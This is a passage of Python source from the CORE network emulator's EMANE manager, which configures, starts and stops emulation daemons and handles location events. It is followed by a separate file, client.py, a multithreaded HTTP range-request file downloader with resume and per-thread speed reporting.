:return: node/interface model configuration
:rtype: dict
"""
# use the network-wide config values or interface(NEM)-specific values?
if interface is None:
return self.get_configs(node_id=node_id, config_type=model_name)
else:
# don"t use default values when interface config is the same as net
# note here that using ifc.node.objid as key allows for only one type
# of each model per node;
# TODO: use both node and interface as key
# Adamson change: first check for iface config keyed by "node:ifc.name"
# (so that nodes w/ multiple interfaces of same conftype can have
# different configs for each separate interface)
key = 1000 * interface.node.objid
if interface.netindex is not None:
key += interface.netindex
# try retrieve interface specific configuration, avoid getting defaults
config = self.get_configs(node_id=key, config_type=model_name)
# otherwise retrieve the interfaces node configuration, avoid using defaults
if not config:
config = self.get_configs(node_id=interface.node.objid, config_type=model_name)
# get non interface config, when none found
if not config:
# with EMANE 0.9.2+, we need an extra NEM XML from
# model.buildnemxmlfiles(), so defaults are returned here
config = self.get_configs(node_id=node_id, config_type=model_name)
return config
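# Illustrative example of the key scheme above (assumed values, not from a
# real session): a node with objid 5 whose interface has netindex 2 is looked
# up under key 1000 * 5 + 2 == 5002 first, then under the plain node key 5,
# and only then under the EmaneNode's own node_id.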
def config_reset(self, node_id=None):
super(EmaneManager, self).config_reset(node_id)
self.set_configs(self.emane_config.default_values())
def emane_check(self):
"""
Check if emane is installed and load models.
:return: nothing
"""
try:
# check for emane
emane_version = utils.check_cmd(["emane", "--version"])
logging.info("using EMANE: %s", emane_version)
# load default emane models
self.load_models(EMANE_MODELS)
# load custom models
custom_models_path = self.session.options.get_config("emane_models_dir")
if custom_models_path:
emane_models = utils.load_classes(custom_models_path, EmaneModel)
self.load_models(emane_models)
except CoreCommandError:
logging.info("emane is not installed")
def deleteeventservice(self):
if self.service:
for fd in self.service._readFd, self.service._writeFd:
if fd >= 0:
os.close(fd)
for f in self.service._socket, self.service._socketOTA:
if f:
f.close()
self.service = None
self.event_device = None
def initeventservice(self, filename=None, shutdown=False):
"""
Re-initialize the EMANE Event service.
The multicast group and/or port may be configured.
"""
self.deleteeventservice()
if shutdown:
return
# Get the control network to be used for events
group, port = self.get_config("eventservicegroup").split(":")
self.event_device = self.get_config("eventservicedevice")
eventnetidx = self.session.get_control_net_index(self.event_device)
if eventnetidx < 0:
logging.error("invalid emane event service device provided: %s", self.event_device)
return False
# make sure the event control network is in place
eventnet = self.session.add_remove_control_net(net_index=eventnetidx, remove=False, conf_required=False)
if eventnet is not None:
# direct EMANE events towards control net bridge
self.event_device = eventnet.brname
eventchannel = (group, int(port), self.event_device)
# disabled otachannel for event service
# only needed for e.g. antennaprofile events xmit by models
logging.info("using %s for event service traffic", self.event_device)
try:
self.service = EventService(eventchannel=eventchannel, otachannel=None)
except EventServiceException:
logging.exception("error instantiating emane EventService")
return True
def load_models(self, emane_models):
"""
Load EMANE models and make them available.
"""
for emane_model in emane_models:
logging.info("loading emane model: %s", emane_model.__name__)
self.models[emane_model.name] = emane_model
def add_node(self, emane_node):
"""
Add a new EmaneNode object to this Emane controller object
:param core.emane.nodes.EmaneNode emane_node: emane node to add
:return: nothing
"""
with self._emane_node_lock:
if emane_node.objid in self._emane_nodes:
raise KeyError("non-unique EMANE object id %s for %s" % (emane_node.objid, emane_node))
self._emane_nodes[emane_node.objid] = emane_node
def getnodes(self):
"""
Return a set of CoreNodes that are linked to an EmaneNode,
e.g. containers having one or more radio interfaces.
"""
# assumes self._objslock already held
nodes = set()
for emane_node in self._emane_nodes.values():
for netif in emane_node.netifs():
nodes.add(netif.node)
return nodes
def setup(self):
"""
Populate self._objs with EmaneNodes; perform distributed setup;
associate models with EmaneNodes from self.config. Returns
Emane.(SUCCESS, NOT_NEEDED, NOT_READY) in order to delay session
instantiation.
"""
logging.debug("emane setup")
# TODO: drive this from the session object
with self.session._objects_lock:
for node in self.session.objects.itervalues():
if nodeutils.is_node(node, NodeTypes.EMANE):
logging.debug("adding emane node: id(%s) name(%s)", node.objid, node.name)
self.add_node(node)
if not self._emane_nodes:
logging.debug("no emane nodes in session")
return EmaneManager.NOT_NEEDED
# control network bridge required for EMANE 0.9.2
# - needs to be configured before checkdistributed() for distributed
# - needs to exist when eventservice binds to it (initeventservice)
if self.session.master:
otadev = self.get_config("otamanagerdevice")
netidx = self.session.get_control_net_index(otadev)
logging.debug("emane ota manager device: index(%s) otadev(%s)", netidx, otadev)
if netidx < 0:
logging.error("EMANE cannot start, check core config. invalid OTA device provided: %s", otadev)
return EmaneManager.NOT_READY
ctrlnet = self.session.add_remove_control_net(net_index=netidx, remove=False, conf_required=False)
self.distributedctrlnet(ctrlnet)
eventdev = self.get_config("eventservicedevice")
logging.debug("emane event service device: eventdev(%s)", eventdev)
if eventdev != otadev:
netidx = self.session.get_control_net_index(eventdev)
logging.debug("emane event service device index: %s", netidx)
if netidx < 0:
logging.error("EMANE cannot start, check core config. invalid event service device: %s", eventdev)
return EmaneManager.NOT_READY
ctrlnet = self.session.add_remove_control_net(net_index=netidx, remove=False, conf_required=False)
self.distributedctrlnet(ctrlnet)
if self.checkdistributed():
# we are slave, but haven't received a platformid yet
platform_id_start = "platform_id_start"
default_values = self.emane_config.default_values()
value = self.get_config(platform_id_start)
if value == default_values[platform_id_start]:
return EmaneManager.NOT_READY
self.check_node_models()
return EmaneManager.SUCCESS
def startup(self):
"""
After all the EmaneNode objects have been added, build XML files
and start the daemons. Returns Emane.(SUCCESS, NOT_NEEDED, or
NOT_READY) which is used to delay session instantiation.
"""
self.reset()
r = self.setup()
# NOT_NEEDED or NOT_READY
if r != EmaneManager.SUCCESS:
return r
nems = []
with self._emane_node_lock:
self.buildxml()
self.initeventservice()
self.starteventmonitor()
if self.numnems() > 0:
self.startdaemons()
self.installnetifs()
for emane_node in self._emane_nodes.itervalues():
for netif in emane_node.netifs():
nems.append((netif.node.name, netif.name, emane_node.getnemid(netif)))
if nems:
emane_nems_filename = os.path.join(self.session.session_dir, "emane_nems")
try:
with open(emane_nems_filename, "w") as f:
for nodename, ifname, nemid in nems:
f.write("%s %s %s\n" % (nodename, ifname, nemid))
except IOError:
logging.exception("Error writing EMANE NEMs file: %s")
return EmaneManager.SUCCESS
def poststartup(self):
"""
Retransmit location events now that all NEMs are active.
"""
if not self.genlocationevents():
return
with self._emane_node_lock:
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
logging.debug("post startup for emane node: %s - %s", emane_node.objid, emane_node.name)
emane_node.model.post_startup()
for netif in emane_node.netifs():
x, y, z = netif.node.position.get()
emane_node.setnemposition(netif, x, y, z)
def reset(self):
"""
remove all EmaneNode objects from the dictionary,
reset port numbers and nem id counters
"""
with self._emane_node_lock:
self._emane_nodes.clear()
# don't clear self._ifccounts here; NEM counts are needed for buildxml
self.platformport = self.session.options.get_config_int("emane_platform_port", 8100)
self.transformport = self.session.options.get_config_int("emane_transform_port", 8200)
def shutdown(self):
"""
stop all EMANE daemons
"""
with self._ifccountslock:
self._ifccounts.clear()
with self._emane_node_lock:
if not self._emane_nodes:
return
logging.info("stopping EMANE daemons.")
self.deinstallnetifs()
self.stopdaemons()
self.stopeventmonitor()
def handledistributed(self, message):
"""
Broker handler for processing CORE API messages as they are
received. This is used to snoop the Link add messages to get NEM
counts of NEMs that exist on other servers.
"""
if message.message_type == MessageTypes.LINK.value and message.flags & MessageFlags.ADD.value:
nn = message.node_numbers()
# first node is always link layer node in Link add message
if nn[0] in self.session.broker.network_nodes:
serverlist = self.session.broker.getserversbynode(nn[1])
for server in serverlist:
with self._ifccountslock:
if server not in self._ifccounts:
self._ifccounts[server] = 1
else:
self._ifccounts[server] += 1
def checkdistributed(self):
"""
Check for EMANE nodes that exist on multiple emulation servers and
coordinate the NEM id and port number space.
If we are the master EMANE node, return False so initialization will
proceed as normal; otherwise slaves return True here and
initialization is deferred.
"""
# check with the session if we are the "master" Emane object?
master = False
with self._emane_node_lock:
if self._emane_nodes:
master = self.session.master
logging.info("emane check distributed as master: %s.", master)
# we are not the master Emane object, wait for nem id and ports
if not master:
return True
nemcount = 0
with self._emane_node_lock:
for key in self._emane_nodes:
emane_node = self._emane_nodes[key]
nemcount += emane_node.numnetif()
nemid = int(self.get_config("nem_id_start"))
nemid += nemcount
platformid = int(self.get_config("platform_id_start"))
# build an ordered list of servers so platform ID is deterministic
servers = []
for key in sorted(self._emane_nodes):
for server in self.session.broker.getserversbynode(key):
if server not in servers:
servers.append(server)
servers.sort(key=lambda x: x.name)
for server in servers:
if server.name == "localhost":
continue
if server.sock is None:
continue
platformid += 1
typeflags = ConfigFlags.UPDATE.value
self.set_config("platform_id_start", str(platformid))
self.set_config("nem_id_start", str(nemid))
config_data = ConfigShim.config_data(0, None, typeflags, self.emane_config, self.get_configs())
message = dataconversion.convert_config(config_data)
server.sock.send(message)
# increment nemid for next server by number of interfaces
with self._ifccountslock:
if server in self._ifccounts:
nemid += self._ifccounts[server]
return False
def buildxml(self):
"""
Build XML files required to run EMANE on each node.
NEMs run inside containers using the control network for passing
events and data.
"""
# assume self._objslock is already held here
logging.info("emane building xml...")
# on master, control network bridge added earlier in startup()
ctrlnet = self.session.add_remove_control_net(net_index=0, remove=False, conf_required=False)
self.buildplatformxml(ctrlnet)
self.buildnemxml()
self.buildeventservicexml()
# TODO: remove need for tlv messaging
def distributedctrlnet(self, ctrlnet):
"""
Distributed EMANE requires multiple control network prefixes to
be configured. This generates configuration for slave control nets
using the default list of prefixes.
"""
session = self.session
# slave server
if not session.master:
return
servers = session.broker.getservernames()
# not distributed
if len(servers) < 2:
return
prefix = session.options.get_config("controlnet")
prefixes = prefix.split()
# normal Config messaging will distribute controlnets
if len(prefixes) >= len(servers):
return
# this generates a config message having controlnet prefix assignments
logging.info("Setting up default controlnet prefixes for distributed (%d configured)" % len(prefixes))
prefixes = ctrlnet.DEFAULT_PREFIX_LIST[0]
vals = 'controlnet="%s"' % prefixes
tlvdata = ""
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.OBJECT.value, "session")
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.TYPE.value, 0)
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.VALUES.value, vals)
rawmsg = coreapi.CoreConfMessage.pack(0, tlvdata)
msghdr = rawmsg[:coreapi.CoreMessage.header_len]
msg = coreapi.CoreConfMessage(flags=0, hdr=msghdr, data=rawmsg[coreapi.CoreMessage.header_len:])
self.session.broker.handle_message(msg)
def check_node_models(self):
"""
Associate EmaneModel classes with EmaneNode nodes. The model
configurations are stored in self.configs.
"""
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
logging.debug("checking emane model for node: %s", node_id)
# skip nodes that already have a model set
if emane_node.model:
logging.debug("node(%s) already has model(%s)", emane_node.objid, emane_node.model.name)
continue
# set model configured for node, due to legacy messaging configuration before nodes exist
model_name = self.node_models.get(node_id)
if not model_name:
logging.error("emane node(%s) has no node model", node_id)
raise ValueError("emane node has no model set")
config = self.get_model_config(node_id=node_id, model_name=model_name)
logging.debug("setting emane model(%s) config(%s)", model_name, config)
model_class = self.models[model_name]
emane_node.setmodel(model_class, config)
def nemlookup(self, nemid):
"""
Look for the given numerical NEM ID and return the first matching
EmaneNode and NEM interface.
"""
emane_node = None
netif = None
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
netif = emane_node.getnemnetif(nemid)
if netif is not None:
break
else:
emane_node = None
return emane_node, netif
def numnems(self):
"""
Return the number of NEMs emulated locally.
"""
count = 0
for emane_node in self._emane_nodes.itervalues():
count += len(emane_node.netifs())
return count
def buildplatformxml(self, ctrlnet):
"""
Build a platform.xml file now that all nodes are configured.
"""
nemid = int(self.get_config("nem_id_start"))
platform_xmls = {}
# assume self._objslock is already held here
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
nemid = emanexml.build_node_platform_xml(self, ctrlnet, emane_node, nemid, platform_xmls)
def buildnemxml(self):
"""
Builds the xxxnem.xml, xxxmac.xml, and xxxphy.xml files which
are defined on a per-EmaneNode basis.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
emanexml.build_xml_files(self, emane_node)
def buildtransportxml(self):
"""
Calls emanegentransportxml using a platform.xml file to build the transportdaemon*.xml.
"""
utils.check_cmd(["emanegentransportxml", "platform.xml"], cwd=self.session.session_dir)
def buildeventservicexml(self):
"""
Build the libemaneeventservice.xml file if event service options
were changed in the global config.
"""
need_xml = False
default_values = self.emane_config.default_values()
for name in ["eventservicegroup", "eventservicedevice"]:
a = default_values[name]
b = self.get_config(name)
if a != b:
need_xml = True
if not need_xml:
# reset to using default config
self.initeventservice()
return
try:
group, port = self.get_config("eventservicegroup").split(":")
except ValueError:
logging.exception("invalid eventservicegroup in EMANE config")
return
dev = self.get_config("eventservicedevice")
emanexml.create_event_service_xml(group, port, dev, self.session.session_dir)
def startdaemons(self):
"""
Start one EMANE daemon per node having a radio.
Add a control network even if the user has not configured one.
"""
logging.info("starting emane daemons...")
loglevel = str(EmaneManager.DEFAULT_LOG_LEVEL)
cfgloglevel = self.session.options.get_config_int("emane_log_level")
realtime = self.session.options.get_config_bool("emane_realtime", default=True)
if cfgloglevel:
logging.info("setting user-defined EMANE log level: %d", cfgloglevel)
loglevel = str(cfgloglevel)
emanecmd = ["emane", "-d", "-l", loglevel]
if realtime:
emanecmd += "-r",
otagroup, _otaport = self.get_config("otamanagergroup").split(":")
otadev = self.get_config("otamanagerdevice")
otanetidx = self.session.get_control_net_index(otadev)
eventgroup, _eventport = self.get_config("eventservicegroup").split(":")
eventdev = self.get_config("eventservicedevice")
eventservicenetidx = self.session.get_control_net_index(eventdev)
run_emane_on_host = False
for node in self.getnodes():
if hasattr(node, "transport_type") and node.transport_type == "raw":
run_emane_on_host = True
continue
path = self.session.session_dir
n = node.objid
# control network not yet started here
self.session.add_remove_control_interface(node, 0, remove=False, conf_required=False)
if otanetidx > 0:
logging.info("adding ota device ctrl%d", otanetidx)
self.session.add_remove_control_interface(node, otanetidx, remove=False, conf_required=False)
if eventservicenetidx >= 0:
logging.info("adding event service device ctrl%d", eventservicenetidx)
self.session.add_remove_control_interface(node, eventservicenetidx, remove=False, conf_required=False)
# multicast route is needed for OTA data
args = [constants.IP_BIN, "route", "add", otagroup, "dev", otadev]
node.check_cmd(args)
# multicast route is also needed for event data if on control network
if eventservicenetidx >= 0 and eventgroup != otagroup:
args = [constants.IP_BIN, "route", "add", eventgroup, "dev", eventdev]
node.check_cmd(args)
# start emane
args = emanecmd + ["-f", os.path.join(path, "emane%d.log" % n), os.path.join(path, "platform%d.xml" % n)]
output = node.check_cmd(args)
logging.info("node(%s) emane daemon running: %s", node.name, args)
logging.info("node(%s) emane daemon output: %s", node.name, output)
if not run_emane_on_host:
return
path = self.session.session_dir
emanecmd += ["-f", os.path.join(path, "emane.log")]
args = emanecmd + [os.path.join(path, "platform.xml")]
utils.check_cmd(args, cwd=path)
logging.info("host emane daemon running: %s", args)
def stopdaemons(self):
"""
Kill the appropriate EMANE daemons.
"""
# TODO: we may want to improve this if we had the PIDs from the specific EMANE daemons that we've started
args = ["killall", "-q", "emane"]
stop_emane_on_host = False
for node in self.getnodes():
if hasattr(node, "transport_type") and node.transport_type == "raw":
stop_emane_on_host = True
continue
if node.up:
node.cmd(args, wait=False)
# TODO: RJ45 node
if stop_emane_on_host:
try:
utils.check_cmd(args)
utils.check_cmd(["killall", "-q", "emanetransportd"])
except CoreCommandError:
logging.exception("error shutting down emane daemons")
def installnetifs(self):
"""
Install TUN/TAP virtual interfaces into their proper namespaces
now that the EMANE daemons are running.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
logging.info("emane install netifs for node: %d", key)
emane_node.installnetifs()
def deinstallnetifs(self):
"""
Uninstall TUN/TAP virtual interfaces.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
emane_node.deinstallnetifs()
def doeventmonitor(self):
"""
Returns boolean whether or not EMANE events will be monitored.
"""
# this support must be explicitly turned on; by default, CORE will
# generate the EMANE events when nodes are moved
return self.session.options.get_config_bool("emane_event_monitor")
def genlocationevents(self):
"""
Returns boolean whether or not EMANE events will be generated.
"""
# By default, CORE generates EMANE location events when nodes
# are moved; this can be explicitly disabled in core.conf
tmp = self.session.options.get_config_bool("emane_event_generate")
if tmp is None:
tmp = not self.doeventmonitor()
return tmp
def starteventmonitor(self):
"""
Start monitoring EMANE location events if configured to do so.
"""
logging.info("emane start event monitor")
if not self.doeventmonitor():
return
if self.service is None:
logging.error("Warning: EMANE events will not be generated "
"because the emaneeventservice\n binding was "
"unable to load "
"(install the python-emaneeventservice bindings)")
return
self.doeventloop = True
self.eventmonthread = threading.Thread(target=self.eventmonitorloop)
self.eventmonthread.daemon = True
self.eventmonthread.start()
def stopeventmonitor(self):
"""
Stop monitoring EMANE location events.
"""
self.doeventloop = False
if self.service is not None:
self.service.breakloop()
# reset the service, otherwise nextEvent won't work
self.initeventservice(shutdown=True)
if self.eventmonthread is not None:
# TODO: fix this
self.eventmonthread._Thread__stop()
self.eventmonthread.join()
self.eventmonthread = None
def eventmonitorloop(self):
"""
Thread target that monitors EMANE location events.
"""
if self.service is None:
return
logging.info("subscribing to EMANE location events. (%s)", threading.currentThread().getName())
while self.doeventloop is True:
_uuid, _seq, events = self.service.nextEvent()
# this occurs with 0.9.1 event service
if not self.doeventloop:
break
for event in events:
nem, eid, data = event
if eid == LocationEvent.IDENTIFIER:
self.handlelocationevent(nem, eid, data)
logging.info("unsubscribing from EMANE location events. (%s)", threading.currentThread().getName())
def handlelocationevent(self, rxnemid, eid, data):
"""
Handle an EMANE location event.
"""
events = LocationEvent()
events.restore(data)
for event in events:
txnemid, attrs = event
if "latitude" not in attrs or "longitude" not in attrs or "altitude" not in attrs:
logging.warn("dropped invalid location event")
continue
# yaw,pitch,roll,azimuth,elevation,velocity are unhandled
lat = attrs["latitude"]
lon = attrs["longitude"]
alt = attrs["altitude"]
logging.debug("emane location event: %s,%s,%s", lat, lon, alt)
self.handlelocationeventtoxyz(txnemid, lat, lon, alt)
def handlelocationeventtoxyz(self, nemid, lat, lon, alt):
"""
Convert the (NEM ID, lat, long, alt) from a received location event
into a node and x,y,z coordinate values, sending a Node Message.
Returns True if successfully parsed and a Node Message was sent.
"""
# convert nemid to node number
_emanenode, netif = self.nemlookup(nemid)
if netif is None:
logging.info("location event for unknown NEM %s", nemid)
return False
n = netif.node.objid
# convert from lat/long/alt to x,y,z coordinates
x, y, z = self.session.location.getxyz(lat, lon, alt)
x = int(x)
y = int(y)
z = int(z)
logging.info("location event NEM %s (%s, %s, %s) -> (%s, %s, %s)", nemid, lat, lon, alt, x, y, z)
xbit_check = x.bit_length() > 16 or x < 0
ybit_check = y.bit_length() > 16 or y < 0
zbit_check = z.bit_length() > 16 or z < 0
if any([xbit_check, ybit_check, zbit_check]):
logging.error("Unable to build node location message, received lat/long/alt exceeds coordinate "
"space: NEM %s (%d, %d, %d)", nemid, x, y, z)
return False
# generate a node message for this location update
try:
node = self.session.get_object(n)
except KeyError:
logging.exception("location event NEM %s has no corresponding node %s" % (nemid, n))
return False
# don"t use node.setposition(x,y,z) which generates an event
node.position.set(x, y, z)
node_data = node.data(message_type=0, lat=str(lat), lon=str(lon), alt=str(alt))
self.session.broadcast_node(node_data)
return True
def emanerunning(self, node):
"""
Return True if an EMANE process associated with the given node is running, False otherwise.
"""
args = ["pkill", "-0", "-x", "emane"]
status = node.cmd(args)
return status == 0
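# Note: "pkill -0 -x emane" sends no signal; its exit status only reports
# whether a process named exactly "emane" exists, so a 0 return code from
# node.cmd() means an EMANE daemon is running inside that node's namespace.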
class EmaneGlobalModel(EmaneModel):
"""
Global EMANE configuration options.
"""
_DEFAULT_DEV = "ctrl0"
name = "emane"
emulator_xml = "/usr/share/emane/manifest/nemmanager.xml"
emulator_defaults = {
"eventservicedevice": _DEFAULT_DEV,
"eventservicegroup": "224.1.2.8:45703",
"otamanagerdevice": _DEFAULT_DEV,
"otamanagergroup": "224.1.2.8:45702"
}
emulator_config = emanemanifest.parse(emulator_xml, emulator_defaults)
emulator_config.insert(
0,
Configuration(_id="platform_id_start", _type=ConfigDataTypes.INT32, default="1",
label="Starting Platform ID (core)")
)
nem_config = [
Configuration(_id="nem_id_start", _type=ConfigDataTypes.INT32, default="1",
label="Starting NEM ID (core)")
]
@classmethod
def configurations(cls):
return cls.emulator_config + cls.nem_config
@classmethod
def config_groups(cls):
emulator_len = len(cls.emulator_config)
config_len = len(cls.configurations())
return [
ConfigGroup("Platform Attributes", 1, emulator_len),
ConfigGroup("NEM Parameters", emulator_len + 1, config_len)
]
def __init__(self, session, object_id=None):
super(EmaneGlobalModel, self).__init__(session, object_id)
def build_xml_files(self, config, interface=None):
raise NotImplementedError
|
client.py
|
from socket import *
import sys
import select
import math
import string
import threading
import argparse
import os.path
import time
#Argument parsing
parser = argparse.ArgumentParser(description = 'Get file from the web')
parser.add_argument('-n' , '--nthreads', type = int, required=True , help='Number of threads for the connection')
parser.add_argument('-i' , '--interval', type = float, required=True , help='Time interval of metric reporting')
parser.add_argument('-c' , '--tlp' ,type = str, required=True , help='TCP or UDP')
parser.add_argument('-f' , '--sourceaddress',type = str, required=True , help='File location on the web')
parser.add_argument('-o' , '--destinationaddress',type = str, required=True , help='File destination address')
parser.add_argument('-r' , '--resume' , action='store_true' , help='Resume download' )
args = parser.parse_args()
#default http header size for most servers
buff_size = 8192
#http port number
portNumber=80
#metric list tracking, per thread, the bytes downloaded and the time spent downloading them
metric = []
#array for bytes per thread
currentdataperthread = []
#geting file type from the header
def getFileType(fields):
if('content-type' not in fields):
ftype = 'txt'
return ftype
else:
#Getting content type format
ftype = fields['content-type']
ftype = ftype.split('/')[1]
ftype = ftype.split(';')[0]
if(ftype == 'plain'):
ftype = 'txt'
return ftype
#Converts file name to a valid file name.
def format_filename(s):
valid_chars = "-_.() %s%s" % (string.ascii_letters, string.digits)
filename = ''.join(c for c in s if c in valid_chars)
filename = filename.replace(' ','_') # I don't like spaces in filenames.
filename = filename.split('.')[0]
return filename
#Splitting URL into the host name, resource address, File name
def urlFields(url):
#removing protocol from the address
if('https' in url):
print("HTTPS")
url = url.replace('https://' , '')
elif('http' in url):
print("HTTP")
url = url.replace('http://' , '')
#Getting host, address, and file name
url = url.split("/")
host = url[0]
faddress = ''
for i in range(1,len(url)):
faddress += '/' + url[i]
fname = url[len(url)-1]
fname = format_filename(fname)
return host , faddress , fname
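# Example (hypothetical URL): urlFields('http://example.com/files/report.txt')
# returns ('example.com', '/files/report.txt', 'report'): the host, the
# resource path, and the sanitised base name later used for log/thread files.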
#Converts the response header message into a dictionary of header fields, splits status and the content from the HEADER response.
def getHeaderFeildsAndContent(data):
temp = data.split(b'\r\n\r\n')
header = temp[0]
content = temp[1]
header = header.decode('utf-8')
if(header == ''):
print("File Not Found")
exit(0)
header = header.split('\r\n')
status = header[0]
header = header[1:]
# header = header
fields = dict()
for i in range(len(header)):
temp = header[i].split(':')
fields[temp[0].lower()] = temp[1].lower()
return status ,fields , content
#check whether the request can be handled using multiple threaded range requests
def checkThreadRequest(fields):
#can be done over multiple threads
if('content-length' in fields.keys() and 'accept-ranges' in fields.keys() and fields['accept-ranges'] != 'none'):
return 1
#can not be done over multiple threads
else:
return 2
return 0
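# When a server reports both 'content-length' and a non-'none' 'accept-ranges'
# header, the file can be split across threads with HTTP Range requests
# (e.g. "Range: bytes=0-8191"), which is exactly what send_request() sends below.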
#processing request for each thread
def processRequest(numberofthreads, dest, logFile , fileaddress ,resume):
global metric , currentdataperthread
#metric array
metric = [None] * numberofthreads
#saving number of threads info
with open(dest + logFile + "_ThreadInfo" , "wb") as myFile:
myFile.write(bytes([numberofthreads]))
myFile.close()
#creating threads and dividing the content over the multiple threads
bytesperthread = math.ceil(int(fields['content-length']) / numberofthreads)
print("Creating threads")
threads = [None]*numberofthreads
sockets = [None]*numberofthreads
#for checking if all the threads have fetched their required data
dataperthread = [None]*numberofthreads
metric = [None] * numberofthreads
#current thread data length used for metric presentation
currentdataperthread = [None] * numberofthreads
check = 0
filecontent = b''
for i in range(numberofthreads):
threadLog = (dest + str(i) + '_' + logFile.split('.')[0] + '_Thread')
begin = i * bytesperthread
end = (begin + bytesperthread - 1)
if(i == numberofthreads - 1):
end=int(fields['content-length']) - 1
filemode = "wb"
#data per thread to check if the file should be created or not
dataperthread[i] = end - begin + 1
#checking if resume is true, resuming file.
if(resume):
filemode = "ab"
begin += (os.stat(threadLog).st_size)
if(begin - 1 == end):
print("Thread complete")
threads[i] = threading.Thread()
else:
print("Thread:" , i , " Range: " , begin ,"-" , end)
sockets[i] = socket(AF_INET,SOCK_STREAM)
threads[i] = myThread(i ,host, faddress , begin , end , sockets[i] , threadLog)
else:
print("Thread:" , i , " Range: " , begin ,"-" , end)
sockets[i] = socket(AF_INET,SOCK_STREAM)
threads[i] = myThread(i ,host, faddress , begin , end , sockets[i] , threadLog)
open(threadLog , filemode)
#current data assigned to the thread
currentdataperthread[i] = end - begin + 1
#starting threads all at once
for thread in threads:
thread.start()
#creating metric thread
metricsThreadTotal = threading.Thread(target=totalReport, args=(args.interval,), daemon=True)
metricsThreadTotal.start()
#waiting for the threads to end
for thread in threads:
thread.join()
#checking if every thread downloaded its full byte range
for i in range(numberofthreads):
threadLog = (dest + str(i) + '_' + logFile.split('.')[0] + '_Thread')
if(os.stat(threadLog).st_size == dataperthread[i]):
check+=1
#creating the final file by merging all the thread files and removing the temporary files.
if(check == numberofthreads):
finalFile = open(fileaddress , 'ab')
for i in range(numberofthreads):
threadLog = (dest + str(i) + '_' + logFile.split('.')[0] + '_Thread')
with open(threadLog, "rb") as myFile:
finalFile.write(myFile.read())
myFile.close()
os.remove(threadLog)
os.remove(dest + logFile + "_ThreadInfo")
print("File complete!")
else:
print("File incomplete, please resume.")
#thread class for handling the request
class myThread (threading.Thread):
def __init__(self, tid,host, faddress, begin, end, clientSocket, threadLog):
threading.Thread.__init__(self)
self.tid = tid
self.host = host
self.faddress = faddress
self.begin = begin
self.end = end
self.clientSocket = clientSocket
self.threadLog = threadLog
def run(self):
send_request(self.tid ,self.host, self.faddress, self.begin, self.end, self.clientSocket, self.threadLog)
#Getting data for each thread
def send_request(tid ,host, faddress, begin, end, clientSocket, threadLog):
# print("Connecting to host: " , host , portNumber)
global numberofthreads, metric
# print("This is number of threads: " , numberofthreads)
if tid != (numberofthreads - 1):
rangeBytes = 'bytes={}-{}'.format(begin,end)
else:
rangeBytes = 'bytes={}-'.format(begin)
#connecting to the server, and sending the HTTP GET request.
clientSocket.connect((host , portNumber))
clientSocket.sendall(b'GET %b HTTP/1.1\r\nHOST: %b \r\nRange: %b \r\n\r\n' %(bytes(faddress , 'utf-8'), bytes(host , 'utf-8'), bytes(rangeBytes, 'utf-8')))
print("request sent for thread: ", tid , '\n')
startTime = time.perf_counter() # time.clock() was removed in Python 3.8
data = clientSocket.recv(buff_size)
endTime = time.perf_counter()
#splitting the first response into header fields, data, and status
status , fields , threadcontent = getHeaderFeildsAndContent(data)
metric[tid] = [(endTime - startTime) , len(threadcontent)]
#opening current thread log for inserting data
with open(threadLog , "ab") as myFile:
myFile.write(threadcontent)
myFile.close()
#checking if the address is valid
if(status == 'HTTP/1.1 200 OK' or status == 'HTTP/1.1 206 Partial Content'):
#getting content length from the header & the type of file for each thread
contentLength = int(fields['content-length'])
#getting data, till the data is equal to the content length or there is no more data. A 15 second safety timeout is added for delays.
while select.select([clientSocket], [], [], 15)[0]:
startTime = time.perf_counter()
data = clientSocket.recv(buff_size)
if not data: break
#appending the content to each thread log file.
with open(threadLog, "ab") as myFile:
myFile.write(data)
myFile.close()
#storing time and length of content downloaded.
endTime = time.perf_counter()
metric[tid][0] += (endTime - startTime)
metric[tid][1] += len(data)
#ending the loop when complete data is received.
if(int(contentLength) == int(os.stat(threadLog).st_size)): break
else:
print("Status: " , status)
#closing socket.
clientSocket.close()
#Metric reporting
def totalReport(sleepTime):
# Prints the total download and speed
global metric, numberofthreads, currentdataperthread
#the total data that is to be downloaded
absoluteData = 0
for datalength in currentdataperthread:
absoluteData+=datalength
absoluteData = absoluteData / 1024
#keep this thread working until the main thread finishes.
while True:
totalTime = 0.0
totalData = 0
for threadNumber in range(numberofthreads):
if(metric[threadNumber] != None):
dtime = metric[threadNumber][0]
data = metric[threadNumber][1] / 1024
totalTime += dtime
totalData += data
if(dtime != 0.0):
speed = data / dtime
else:
totalData+=data
speed = 0
#if threads data is complete
if(metric[threadNumber][1] != currentdataperthread[threadNumber]):
str = "Connection {}: {}/{}, download speed: {} kb/s" \
.format(threadNumber, data, currentdataperthread[threadNumber] / 1024, speed)
print(str,'\n')
else:
str = "Connection {}: , Completed" \
.format(threadNumber)
print(str,'\n')
#if all the data is complete
if(totalTime != 0.0 and totalData != absoluteData):
str = "Total: {}/{}, download speed: {} kb/s" \
.format(totalData, absoluteData, totalData / totalTime)
print(str,'\n')
print("Next iterval\n")
else:
print("Download Completed.")
#putting the thread to sleep for the time interval
time.sleep(sleepTime)
#main()
if __name__ == '__main__':
#getting url and splitting it into separate fields
url = args.sourceaddress
host , faddress , fname = urlFields(url)
print("Host: " , host , " Address: " , faddress , " Name: " , fname)
#converting fname to valid file name
fname = format_filename(fname)
#getting destination address from the arguments
dest = args.destinationaddress
if(dest == '.'):
dest = ''
#connection to get HEADER of requested page to check whether the page is correct and what kind of request can be handled.
s = socket(AF_INET, SOCK_STREAM)
s.connect((host , portNumber))
#sending header request
s.sendall(b'HEAD %b HTTP/1.1\r\nHOST: %b \r\n\r\n' %(bytes(faddress , 'utf-8') , bytes(host , 'utf-8')))
print("Request Sent \n")
data = s.recv(buff_size)
status ,fields , content = getHeaderFeildsAndContent(data)
ftype = getFileType(fields)
#Creating file address
fileaddress = dest + fname + '.' + ftype
logFile = fname
